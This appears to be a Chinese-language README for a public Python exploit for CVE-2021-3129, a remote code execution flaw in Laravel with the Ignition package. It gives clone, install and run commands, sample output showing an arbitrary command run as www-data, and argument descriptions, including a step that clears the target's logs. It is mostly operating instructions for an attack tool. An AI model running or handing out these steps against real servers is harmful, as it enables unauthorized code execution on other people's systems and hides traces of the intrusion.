这是一个针对CVE-2021-3129的Python漏洞利用脚本,该漏洞是当Laravel安装了Ignition包时存在的远程代码执行漏洞。攻击者可以通过PHAR反序列化执行任意系统命令。
phpggc 自动生成PHAR载荷id、whoami 等)requests 库克隆仓库:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
安装所需的Python包:
pip install requests
使用目标URL和命令运行脚本:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
示例输出:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target(必需):存在漏洞的Laravel应用的URL。--cmd(可选):要在目标上执行的命令(默认:whoami)。--log_path(可选):要使用的日志文件路径(默认:../storage/logs/laravel.log)。
